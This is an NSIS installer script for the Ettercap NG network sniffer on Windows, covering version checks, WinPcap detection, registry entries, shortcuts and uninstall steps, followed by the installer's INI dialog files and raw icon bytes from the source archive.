;-------------------------------- ;Reserve Files ;These files should be inserted before other files in the data block ReserveFile "eNG-radiobuttons.ini" ReserveFile "eNG-message.ini" !insertmacro MUI_RESERVEFILE_INSTALLOPTIONS ;-------------------------------- ;Pages ; welcome !define MUI_WELCOMEPAGE_TITLE "Welcome to the Ettercap NG ${VER_DISPLAY} Setup Wizard" !define MUI_WELCOMEPAGE_TEXT "This wizard will guide you through the installation of Ettercap NG ${VER_DISPLAY}, the next generation of the popular ettercap sniffer.\r\n\r\nEttercap NG includes a new Modern GTK User Interface, plugin support, support for multiple MITM attack at the same time and a more structured core.\r\n\r\n" !insertmacro MUI_PAGE_WELCOME ; check for the correct windows version Page custom CheckWindowsVersion ; license !insertmacro MUI_PAGE_LICENSE "LICENSE.txt" ; check for the presence of winpcap Page custom CheckWinpcap ; already installed, what to do ? Page custom PageReinstall PageLeaveReinstall ; components !insertmacro MUI_PAGE_COMPONENTS ; directory !insertmacro MUI_PAGE_DIRECTORY ; start menu !define MUI_STARTMENUPAGE_REGISTRY_ROOT "HKCU" !define MUI_STARTMENUPAGE_REGISTRY_KEY "Software\ettercap_ng" !define MUI_STARTMENUPAGE_REGISTRY_VALUENAME "Start Menu Folder" !insertmacro MUI_PAGE_STARTMENU Application $STARTMENU_FOLDER ; install !insertmacro MUI_PAGE_INSTFILES ; finish !define MUI_FINISHPAGE_NOAUTOCLOSE !define MUI_FINISHPAGE_LINK "Visit the Ettercap website for the latest news, FAQs and support" !define MUI_FINISHPAGE_LINK_LOCATION "http://ettercap.sf.net/" !define MUI_FINISHPAGE_NOREBOOTSUPPORT !insertmacro MUI_PAGE_FINISH ; uninstall !insertmacro MUI_UNPAGE_CONFIRM !insertmacro MUI_UNPAGE_INSTFILES ;-------------------------------- ;Languages !insertmacro MUI_LANGUAGE "English" ;-------------------------------- ;Installer Sections Section "Ettercap NG core" SecCore ; this is required, make it unchangeable by the user SectionIn RO SetOverwrite on SetOutPath "$INSTDIR" File ..\..\ettercap.exe File ..\..\*.dll SetOutPath "$INSTDIR\share" File ..\..\share\* SetOutPath "$INSTDIR\etc\pango" File ..\..\etc\pango\* SetOutPath "$INSTDIR\etc\gtk-2.0" File ..\..\etc\gtk-2.0\* SetOutPath "$INSTDIR\etc\fonts" File ..\..\etc\fonts\* SetOutPath "$INSTDIR\lib\pango\1.4.0\modules" File ..\..\lib\pango\1.4.0\modules\* SetOutPath "$INSTDIR\\lib\gtk-2.0\2.4.0\engines" File ..\..\lib\gtk-2.0\2.4.0\engines\* SetOutPath "$INSTDIR\\lib\gtk-2.0\2.4.0\loaders" File ..\..\lib\gtk-2.0\2.4.0\loaders\* SectionEnd Section "Etterlog" SecEtterlog SetOutPath "$INSTDIR" SetOverwrite on File ..\..\etterlog.exe SectionEnd Section "Etterfilter" SecEtterfilter SetOutPath "$INSTDIR" SetOverwrite on File ..\..\etterfilter.exe SectionEnd Section "Plugins" SecPlugins SetOutPath "$INSTDIR\lib" SetOverwrite on File ..\..\lib\*.dll SectionEnd Section "Documentation" SecDocs SetOutPath "$INSTDIR\doc" File ..\..\doc\*.pdf IntOp $DOCUMENTATION 0 + 1 ; remember this for further use SectionEnd ; Hidden section for the uninstaller ; it needs to be created whichever options the user choose Section "-Make the uninstaller" SetOutPath "$INSTDIR" ;Store installation folder WriteRegStr HKLM "Software\ettercap_ng" "" $INSTDIR WriteRegDword HKLM "Software\ettercap_ng" "VersionMajor" "${VER_MAJOR}" WriteRegDword HKLM "Software\ettercap_ng" "VersionMinor" "${VER_MINOR}" WriteRegDword HKLM "Software\ettercap_ng" "VersionRevision" "${VER_REVISION}" ;Create uninstaller WriteUninstaller "$INSTDIR\Uninstall.exe" ; make the unisntall appear in the control panel "add/remove programs" WriteRegExpandStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "UninstallString" '"$INSTDIR\uninstall.exe"' WriteRegExpandStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "InstallLocation" "$INSTDIR" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "DisplayName" "Ettercap NG ${VER_DISPLAY}" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "DisplayIcon" "$INSTDIR\ettercap.exe,0" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "DisplayVersion" "${VER_DISPLAY}" WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "VersionMajor" "${VER_MAJOR}" WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "VersionMinor" "${VER_MINOR}" WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "VersionRevision" "${VER_REVISION}" WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "NoModify" "1" WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "NoRepair" "1" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "URLInfoAbout" "http://ettercap.sourceforge.net" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "Publisher" "Ettercap developers" WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "URLUpdateInfo" "http://ettercap.sf.net/download" ;start menu !insertmacro MUI_STARTMENU_WRITE_BEGIN Application ;Create shortcuts CreateDirectory "$SMPROGRAMS\$STARTMENU_FOLDER" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\ettercap.lnk" "$INSTDIR\ettercap.exe" "-G" ; the command propmt to use etterfilter and etterlog ReadRegStr $R1 HKEY_LOCAL_MACHINE "SOFTWARE\Microsoft\Windows NT\CurrentVersion" "CurrentVersion" StrCpy $9 $R1 1 StrCmp $9 '4' 0 win_2000_XP ; Windows NT 4.0 CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\ettercap prompt.lnk" "$SYSDIR\command.com" "" Goto end win_2000_XP: CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\ettercap prompt.lnk" "$SYSDIR\cmd.exe" "" end: ; links to the documenation IntCmp $DOCUMENTATION 1 0 no_doc CreateDirectory "$SMPROGRAMS\$STARTMENU_FOLDER\docs" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-ettercap.lnk" "$INSTDIR\doc\ettercap.pdf" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-ettercap_curses.lnk" "$INSTDIR\doc\ettercap_curses.pdf" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-ettercap_plugins.lnk" "$INSTDIR\doc\ettercap_plugins.pdf" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-etterfilter.lnk" "$INSTDIR\doc\etterfilter.pdf" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-etterlog.lnk" "$INSTDIR\doc\etterlog.pdf" CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\docs\man-etter.conf.lnk" "$INSTDIR\doc\etter.conf.pdf" no_doc: CreateShortCut "$SMPROGRAMS\$STARTMENU_FOLDER\Uninstall.lnk" "$INSTDIR\Uninstall.exe" !insertmacro MUI_STARTMENU_WRITE_END SectionEnd ;-------------------------------- ;Descriptions ;Assign language strings to sections !insertmacro MUI_FUNCTION_DESCRIPTION_BEGIN !insertmacro MUI_DESCRIPTION_TEXT ${SecCore} "The ettercap NG core components." !insertmacro MUI_DESCRIPTION_TEXT ${SecEtterlog} "Etterlog: the utility to parse the ettercap NG logs" !insertmacro MUI_DESCRIPTION_TEXT ${SecEtterfilter} "Etterfilter: the utility to compile content filter scripts to be used within ettercap NG" !insertmacro MUI_DESCRIPTION_TEXT ${SecPlugins} "Various plugins" !insertmacro MUI_DESCRIPTION_TEXT ${SecDocs} "The most important part: the documentation !" !insertmacro MUI_FUNCTION_DESCRIPTION_END ;-------------------------------- ;Functions Function .onInit ; extract the ini for the custom UI !insertmacro MUI_INSTALLOPTIONS_EXTRACT "eNG-radiobuttons.ini" !insertmacro MUI_INSTALLOPTIONS_EXTRACT "eNG-message.ini" FunctionEnd Function UserAbort StrCmp $CHECKFAILED "1" exit 0 !insertmacro MUI_ABORTWARNING exit: FunctionEnd Function CheckWindowsVersion ReadRegStr $R1 HKEY_LOCAL_MACHINE "SOFTWARE\Microsoft\Windows NT\CurrentVersion" "CurrentVersion" StrCmp $R1 "" 0 GoodVersion ; we are not 2000/XP/2003 ; disable the 'back' and 'next' buttons GetDlgItem $NEXTBUTTON $HWNDPARENT 1 GetDlgItem $BACKBUTTON $HWNDPARENT 3 GetDlgItem $CANCELBUTTON $HWNDPARENT 2 ShowWindow $NEXTBUTTON 0 ShowWindow $BACKBUTTON 0 SendMessage $CANCELBUTTON ${WM_SETTEXT} 0 "STR:Exit" StrCpy $CHECKFAILED "1" !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-message.ini" "Field 1" "Text" "Ettercap NG was compiled to run only on Windows 2000 / XP or greater\r\n\r\nYou can download the source code and try to recompile it for your platform." !insertmacro MUI_HEADER_TEXT "Incorrect Windows version" "" !insertmacro MUI_INSTALLOPTIONS_DISPLAY "eNG-message.ini" GoodVersion: FunctionEnd Function CheckWinpcap IfFileExists "$SYSDIR/packet.dll" WinpcapOK !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-message.ini" "Field 1" "Text" "The installer didn't find the file packet.dll in $SYSDIR.\r\n\r\nYou have to install winpcap in order to be able to execute ettercap." !insertmacro MUI_HEADER_TEXT "Missing Winpcap installation" "" !insertmacro MUI_INSTALLOPTIONS_DISPLAY "eNG-message.ini" WinpcapOK: FileClose $1 FunctionEnd Function PageReinstall ReadRegStr $R0 HKLM "Software\ettercap_ng" "" StrCmp $R0 "" 0 +2 Abort ;Detect version ReadRegDWORD $R0 HKLM "Software\ettercap_ng" "VersionMajor" IntCmp $R0 ${VER_MAJOR} minor_check new_version older_version minor_check: ReadRegDWORD $R0 HKLM "Software\ettercap_ng" "VersionMinor" IntCmp $R0 ${VER_MINOR} revision_check new_version older_version revision_check: ReadRegDWORD $R0 HKLM "Software\ettercap_ng" "VersionRevision" IntCmp $R0 ${VER_REVISION} same_version new_version older_version new_version: !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 1" "Text" "An older version of Ettercap NG is installed on your system. It's recommended that you uninstall the current version before installing. Select the operation you want to perform and click Next to continue." !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 2" "Text" "Uninstall before installing" !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 3" "Text" "Upgrade to version ${VER_DISPLAY}" !insertmacro MUI_HEADER_TEXT "Already Installed" "Choose how you want to install Ettercap NG." StrCpy $R0 "1" Goto reinst_start older_version: !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 1" "Text" "A newer version of Ettercap NG is already installed! It is not recommended that you install an older version. If you really want to install this older version, it's better to uninstall the current version first. Select the operation you want to perform and click Next to continue." !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 2" "Text" "Uninstall before installing" !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 3" "Text" "Downgrade to version ${VER_DISPLAY}" !insertmacro MUI_HEADER_TEXT "Already Installed" "Choose how you want to install Ettercap NG." StrCpy $R0 "1" Goto reinst_start same_version: !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 1" "Text" "Ettercap NG ${VER_DISPLAY} is already installed. Select the operation you want to perform and click Next to continue." !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 2" "Text" "Add/Reinstall components" !insertmacro MUI_INSTALLOPTIONS_WRITE "eNG-radiobuttons.ini" "Field 3" "Text" "Uninstall Ettercap NG" !insertmacro MUI_HEADER_TEXT "Already Installed" "Choose the maintenance option to perform." StrCpy $R0 "2" reinst_start: !insertmacro MUI_INSTALLOPTIONS_DISPLAY "eNG-radiobuttons.ini" FunctionEnd Function PageLeaveReinstall ; check the selected option !insertmacro MUI_INSTALLOPTIONS_READ $R1 "eNG-radiobuttons.ini" "Field 2" "State" StrCmp $R0 "1" 0 +2 StrCmp $R1 "1" reinst_uninstall reinst_done StrCmp $R0 "2" 0 +3 StrCmp $R1 "1" reinst_done reinst_uninstall reinst_uninstall: ReadRegStr $R1 HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" "UninstallString" ;Run uninstaller HideWindow ClearErrors ExecWait '$R1 _?=$INSTDIR' IfErrors no_remove_uninstaller IfFileExists "$INSTDIR\ettercap.exe" no_remove_uninstaller Delete $R1 RMDir $INSTDIR no_remove_uninstaller: StrCmp $R0 "2" 0 +2 Quit BringToFront reinst_done: FunctionEnd ;-------------------------------- ;Uninstaller Section Section "Uninstall" Delete "$INSTDIR\Uninstall.exe" Delete "$INSTDIR\etter*.exe" Delete "$INSTDIR\*.dll" Delete "$INSTDIR\ettercapNG-${VER_DISPLAY}_cvs_debug.log" RMDir /r "$INSTDIR\doc" RMDir /r "$INSTDIR\lib" RMDir /r "$INSTDIR\etc" RMDir /r "$INSTDIR\share" RMDir "$INSTDIR" !insertmacro MUI_STARTMENU_GETFOLDER Application $MUI_TEMP Delete "$SMPROGRAMS\$MUI_TEMP\ettercap.lnk" Delete "$SMPROGRAMS\$MUI_TEMP\ettercap prompt.lnk" Delete "$SMPROGRAMS\$MUI_TEMP\Uninstall.lnk" Delete "$SMPROGRAMS\$MUI_TEMP\docs\*" RMDir /r "$SMPROGRAMS\$MUI_TEMP\docs" ;Delete empty start menu parent diretories StrCpy $MUI_TEMP "$SMPROGRAMS\$MUI_TEMP" startMenuDeleteLoop: RMDir $MUI_TEMP GetFullPathName $MUI_TEMP "$MUI_TEMP\.." IfErrors startMenuDeleteLoopDone StrCmp $MUI_TEMP $SMPROGRAMS startMenuDeleteLoopDone startMenuDeleteLoop startMenuDeleteLoopDone: DeleteRegKey /ifempty HKLM "Software\ettercap_ng" DeleteRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\ettercap_ng" SectionEnd ; vim:ts=3:expandtab ettercap-0.8.3.1/contrib/nsis/eNG-message.ini000664 000000 000000 00000000114 13711276346 020666 0ustar00rootroot000000 000000 [Settings] NumFields=1 [Field 1] Type=Label Left=0 Right=-1 Top=0 Bottom=24 ettercap-0.8.3.1/contrib/nsis/eNG-radiobuttons.ini000664 000000 000000 00000000316 13711276346 021763 0ustar00rootroot000000 000000 [Settings] NumFields=3 [Field 1] Type=Label Left=0 Right=-1 Top=0 Bottom=24 [Field 2] Type=RadioButton Left=30 Right=-1 Top=50 Bottom=58 State=1 [Field 3] Type=RadioButton Left=30 Right=-1 Top=70 Bottom=78 ettercap-0.8.3.1/contrib/nsis/eNG.ico000664 000000 000000 00000033116 13711276346 017247 0ustar00rootroot000000 000000 (vhž è ¨î 00¨– h>!  ¨¦%( À€€€€€€€€€ÀÀÀ€€€ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿww÷xˆÿÿÿÿ÷ˆˆÿÿÿÿ÷ˆˆð†††÷ˆ‡ðˆˆx÷x†ðÿwwÿÿÿÿ÷wÿÿÿÿÿÿð÷ðˆÿÿÿð‡ÿÿÿøpˆð‡ÿÿÿÿðÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ( @i`IngS|oVn~^¢|&˜V€}mqŽ\lžomŸpцÝ”ÿœ(œˆSŽ\•œY”`’gŸp˜v¡ŸpŽ¬j…¾d¡¦{³¤uÓ»{ÿ¼nÿ¾ƒÆ{in“nw w¤~ƒª~Š¬™ƒ‡‡”ˆ•–ž¤šŒ¥—Ÿ§Ž¢©…¡¨ˆ¤µˆ¹³©§“ ©”««˜ °’¤¶–¦¼“£°‰Œª– •¹ˆ¥¨‡¸£´¦¤·®£±­­¤· ­µ®«¿¨²°¬´¿­¡®¼¹³±º¶¶±³¼°·¿ºµ¹É³†Æ»‹Ã¼£Ã´¨Å·¬È¸¹‡Ç‡³ÁŠ¬Ì¦À£Ð”‹É£šÆ¾¨Æ§§Æ­½È¡¨Ó¡¹Ø§­Ë±«Í¼»Ú²ÜÁ›ÉÁ¤ÉÌ¡ÃëÏÅ­ÉίÕƨÒʬÜ˨ÜØ¥ÕܯÁÏ´ÛαÉܱÈÞ»Ô×´ÛѳÒÓ¾ÕÔ½Ø×¼ÑܾÞÚ¿áЭãÖ½ÿÚµ–Ó’°É©·À§­Û§¯Ý¨®Ü§±Ú´¾Ù²ºÞ¶¿ß¶¿á­ËÀªÍǶÉÁ¸ÂȾÄʯÙζÕ˺ÒɼÊã¼ÎëÍÅÀÈÇÆÈÈÆÓÍÂÒÌÈÁÓÎÐÓÎÅËÑÇÍÓÓÒÐÖÑÑÐÒ×Ð×ÔÓÙÖâÜÅâßÎÂàÑÌáÛÌåÝÕçÞàáËååØÝÞá×ÞðÝéãØèäàëææçêãéëåìëëëïêìíììíçòîíîðÿÿÿÿÿÿ®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®aaMa®ša®®®®®®®®®®K®®®®®®®®®®a®®®K®®®oK®®®®aaa-®®®®®®®®®®oaa®®®®®®®®®®®®®®®'G®®‘®$®®®®®®®®®:®®®®®®®&®®D<®$®G®®®®®®®®®( @€€€€€€€€€€ÀÀÀ€€€ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ÷www€ÿÿxwww€ˆˆˆˆˆˆˆˆˆÿ÷wxŒv€ÿÿÿÿÿÿÿÿÿÿwwÇgˆ€ÿÿÿÿÿÿÿÿÿÿwvx‡g€ÿÿÿÿÿÿÿÿÿÿwgg†|pÿÿÿÿÿÿÿÿÿÿwˆ|xˆ€ÿÿ@÷wÇggˆ€ÿÿˆˆˆÈhX÷wˆˆ|x€ÿÿˆx‡‡ˆxÿwˆ‡gX€ÿÿˆˆˆˆˆˆÿwv|xˆ€ÿÿ†„†ˆˆÿwwˆ‡‡€ÿÿˆÿ÷wxˆ|€ÿÿÿÿÿÿÿ€vÿ÷wwxˆ€ÿÿÿÿÿÿÿpˆÿÿwwww`ÿÿÿÿÿÿÿ€xÿÿÿwww€ÿÿÿÿÿÿÿ€ˆÿÿÿÿww€ÿÿvÿÿÿÿÿ÷€ÿÿˆˆˆˆˆˆÿÿÿÿ÷pÿÿwwwwwwÿÿðÿÿÿÿÿÿðÿðÿøÿÿÿÿÿ÷øÿð€ˆÿÿÿÿÿÿðÿð€ÿ€øÿð€wpÿÿÿÿÿÿÿÿÿð‡ÿÿÿÿÿÿÿÿ€ðˆðÿÿÿÿÿÿÿððÿ÷ÿÿÿÿÿÿÿð‡ˆwwwwww( @€985oRwYoWFC=sX'=DwgvKfSus[TZy^b~ddaylgxreZŽw šq=oLŒuCš|F–uW¡tP—|c‡wx¢~`gœ^h©U|º[q…jp‹ph±nf·uzÁm|Ãzž†>¨Œ9ÿŽè–ú—ÿ2ÿ¡.›„L…“M‡Sœ†V‚œ\ž‘_£ŠA¨—Zšˆfž–f“ˆyœ™x£™i£Žz¤›wš©j°jŸ£w˜»y¥¥d°¢i¡¤xºªx¨³}Á²_é°Jÿ²PƯ}ÿ´ié®uŽÁhŒÅv—Äv)4…3<‚FP˜_fškvŽoy•z{”lv®p}¯u´^jÅr}Í…x†|‚z‰u«ƒz¹št¥¥~¸¯{ʼn‰„ƒ’Œ„ž—†‹‡—†˜•š–—£“ƒ¢•‹ ¥š–¬™“ —œ š®œ˜£‹ž­—Ÿµš¡¨†³ª†£´‹º·‰¡«’®­“¢£›© ¢¯Ÿ¸«–¤¹•ˆ–¨’˜©ˆœ°–ºˆ¬ª—¡­‚²«ž±§š¥¶Œµ°¼µ¤¥ ª¤¤¢¨£¨¨¤®§¨®«¬³«ª¦¹¥°¸¡»»¢¤¨±²®µ¬²¸´²²ºµ³¼¼µ³·¾¸µ¸¼ººÁ®‡Ã´†Ë¼—Ó¼”è¼–Á««Èµ²Ç»¼ŒË‰˜Ê…€ÅšÌ˜žÐ—§ÆŠ¦Ê˜·Í—«Ð“´ÔžË¯“̨‹È·™Ìµ¦Å¨§Ô¦¶×¨©È··Ìº©Õ»ºÛ¹É×ÑÀ•ÿÈ•ÁÁ¡ÊÅ¥ÃÄ«ÉÇ©×Ê©ÄÖ§×תÀôÍƱÉË´ÀƺÄË»ÌË»ÓβÊÚ´ØÕ·ãͬäÕ¦ÿÓ©áÕ¸ÿÛ·‡Î—Ì‘ŸÃŒ•Ó‰§À“©À›¤×”¸Ó¥ªÌ«¶Ä¸ºÁ£«Û¦µÜ´¼ß¹¿ã›ÓÄ«ÍÁ¹ÉƤÑõ×Ë Äà¹ÆäÇÇÄÕÉÊÄÕÊÙÚÅÇËÔËÖÒ×ØÖâÜÆáÜÜÊàÄÑàÅÆã×ÖåÚåáÎåä×ÄÊâÊÖè×ÛçÓÛðÛèæèêëæðíëìðíóñÿÿÿýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýýë      g    ýýýý  Â `e‡‡‡‡‡‡‡‡eea``ýýý r87ýýýýýýýýýýýýýýýýýýýýëÂÂz98888ýýýýýýýýýýýýýýýýýýýýÂÂz8888988ýýýýýýýýýýýýýýýýýýýý»Â88888888ýýýýýýýýýýýýýýýýýýýù»z78888888ýýýýýòÂz89889888ýýýý ýó 8888898ýýýý88988988898ýùÂÂr8888888ýýýý888888888883ýý 8889888ýýýý 83ýýÇ ÂÂr88988ýýýý  83ýýý»Â Â 8888ýýýýýýýýýýýýýý`83ýýýë»Â z8ýýýýýýýýýýýýýýl83ýýýýë Â ÂÂ` ýýýýýýýýýýýýýýe83ýýýýýýǠ ` ýýýýýýýýýýýýýý`8ýýýýýýýýò Â`ýýýý 83ýýýýýýýýýýýó`ýýýý55558j8ýýýýýýýýêùùùlýýýý¡¡¡¡¡¡¡¡¡¡¡™ýýýýýêýýaý‡ýýýýýýýýýýýíýýýýýùýýí‡ýýýýýýýýýýýùýýýýýí‡ý‡ýýýýýýýýýýýùýýýýýýýýýaýýlýýýýý˜ŒŒýýýýýýýýýýýýýýýýýýùêýýýýýýýýýýýýýýýýýýýý`ýýý ˜ýýýýýýýýýýýýýýýýýýýýýýýëùýýýýýýýýýýýýýýëýýål‡‡˜˜™™™å™åååê(0`€ 6. <1 >8,++544A6 SIDA6!V"(Y&/o:BygvHiiVeuWsrRxldxwh{ww^ž|¤y ²}–^1Œg(˜g8šr>Æ{”dDšyE…y[™xWƒmoxj•~hnwˆvzi‡K}“KhŠXh—Y~™Xi¬Gy·Lg®Xvº[u…ifŸg~‰xg¥g~ ck³gyºhb©siºuy¿~xÂw¸ˆ ´ˆ°¢4Õ™ÿŽì˜ú•ÿ‘ÿŸ&þ3Ï©;þ¥:„L›N†„Pœ‡T›—X¥•[±Ÿ_¡]‰»U›‰fœ”gŽ€|–†wœ•x¢™i£Œu¡™w¨kž¦k„½`Ÿ¦yºr±v©¦g²¥j¢¤x¹©v¨³{·³|·]õ®Dþ®_ͳkعi«xʸyþ´c„Âl“ÁjŠÄx™Å{¤ÆyÓÀz-9‘KTŽ\dŠpsŒJX¿Xb«lv²nyʇw‰vŒ˜v¶Žuªw©¨mÁ€xƉ|Ä—~µ{…Ή…†’‰Š›—Š††—˜Œ•›––¥–‰¦š—ž¦‹œ§–ž´˜¡¨‡¸­Š¥·Š¸·‹£¦—¼ª”£¸—··˜‰–«£§“¬®¨¨§¶«©¥·£º¶§¤©¶¨¶¶¹¸¸Ç¶ŠÇ»•Ó½˜ý¹‚¬«Ä¾®Æºº÷º¤‰ÉˆšË‰†É——̘›Ñ™¦Ëˆ¨ÇµÊ”¨Ñ˜¹Ñ›‡Ç¥”ͨҥˆÈ¸—Ë·ŸÐ¿¦Å§¾Ì¡§Ô¥¸Ö¤¨É·¶Ä¼§ÓµºÚµÅ—ÒÚþņþÊ›áÚœÈŦ×ʨÇרØØ©ÇȵÙγÉصØÖ¸àÍ­àÖ¢þÓ«àϱ÷ɼáÕ¸þܸË໋”Ò•«Ï­¶Ó´»àÀ¾ÀпœÀÞ«ËÁ·ÊŪÕƶÕɽÈÚ·ÞѼßÒ½àÓ·ÇçÆÇÆÒËËÆÔÊ×ÖÆÅÊÕËÖÓØÙ×âÛÅ÷ÙÍáÝÚ÷ßÒÉàÈÔáÈÉãÙÕåÜäàÊåä×÷áÕÏÖèÙæäèëêèðíððïèêðëóñÿÿÿþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþûþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþûÊ¥œ¥¥¥œ¦ÊèèõûûþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþûÚœœ¥¥¥¥¥¥œÊþþþþþû¥œ¥¥œÉ¦œœœÅ¥Qƒ„ˆˆ™™™™™™™™™™™ˆˆˆ„„ƒƒþþþþûœ¥¥œÉ¥“SSSS‰S"ˆþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÉ¥œ¥¥“USUUUUUU"™þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ襥¥¥OUUUUSUUU"šþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ¦¥¥œUUUUUUUUUS"Ÿþþþþþþþþþþþþþþþþþþþþþþþþþþþþþõ¥¥œ“UUUUUUSUUUU"Ÿþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ蜥¤UUUSUUUUSUUU"ÙþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÊ¥¥SUUUUUUUUUUUU"ÙþþþþþþþûÊœ¥SUUUUSUUUUUSU"åþþþþþûþû¦¥¥UUUUUUSUUUUUU"æþþþþþõO"""""OþûÊœ¥UUUUUUSUUUUS"æþþþþþë`SUUUSUUUUUUUUUUUþûÚÅ¥“UUUUUUUSUUUU"ëþþþþþå`UUUUUUUUUUSUUUUUþþÊ¥¥¥SUUUUUUUSUUU"îþþþþþæhUUUUUUSUUUUUUUUS`þþ蜥¥œUUUUUUUUSUU"îþþþþþî¢hhh“h`h“h`h“hUU`þþù¥¥œ¥œSUUUUUUUUU"ùþþþþþùUUhþþþÊ¥¥¥¥¥‰UUUUUUUS"ùþþþþþþUUþþþõ¥¥œ¥¥¥“SUUUUUU"ûþþþþþþûþþþþþþþþþþþþþþUU`þþþþ¥¥¥¥œ¥¥œ“OUUU"ûþþþþþþþþþþþþþþþþþþþþþƒSUþþþþû¥œ¥¥¥¥¥¥œœ“SU"ûþþþþþþþþþþþþþþþþþþþþþˆUU`þþþþþû¥¥¥¥¥œ¥¥¥¥ÉʃþþþþþþþþþþþþþþþþþþþþþþˆUUþþþþþþûôœœ¥¥¥¥œ¥¥ÉQþþþþþþþþþþþþþþþþþþþþþþ„UU`þþþþþþþþû蜜¥Å¥œ¥ÉQûþþþþþþþþþþþþþþþþþþþþþƒUSþþþþþþþþþþû襥¥¥¥¥Qûþþþþþþˆˆ™ŸåëùþþþþþùåˆUU`þþþþþþþþþþþþþõèÉœ¥QûþþþþþþUOSþþþþþþþþþþþþþþþûõôQûþþþþþþ…"%Q%Q%Q%Q%Q%Q%‰““þþþþþþþþþþþþþþþþþþšûþþþþþþ¤‰‰‰‰‰‰‰‰‰‰‰‰‰‰‰…“þþþþþþþþþþû刈ˆˆ™™„ˆ™ùþþþþþþþþþþþþþþþþþþþþþÙûþþþþþþûæþþþ„þþþþþþþþþþþþþþþþþþþþŸþþ뙟ûþþþˆ™ƒÙþþþþþþþþþþþþþþþþþþþŸþþÙþûþþ„þþþþûþþþþþþþþþþþþþþþþþþþšþþÙþþþþþþ™þþëþþþþþþþþþþþþþþþþþþŸþþÙˆþþþþþûûþþþˆšþþÙùþþþþþþûˆþþþ惃Ÿþþæˆþþþþþþþû™ŸšŸšþûþûþþþþþþþþþþþþþþþûûšþþþþþþþþþþþþûƒþþþþþþþþþþþþþþþþþþþþþŸþþþþþÙþþþþû„„þþþþþþþþþþþþþþþþþþþþþšþþþþƒþþþûþŸûþþŸþþþþþþþþþþþþþþþþþþþþþŸþþþþþþþûûþþþþþþþþþþþþþþþþþþþþþþþþþþšþîþþþåþþþîˆþþþþþþþþþþþþþþþþþþþþþþšˆþþþ™™ššŸŸÙÙÙÙåÙåååååæå惃„ÙÙÙÙÙææëæëÙÙåëææëæææææææææ(  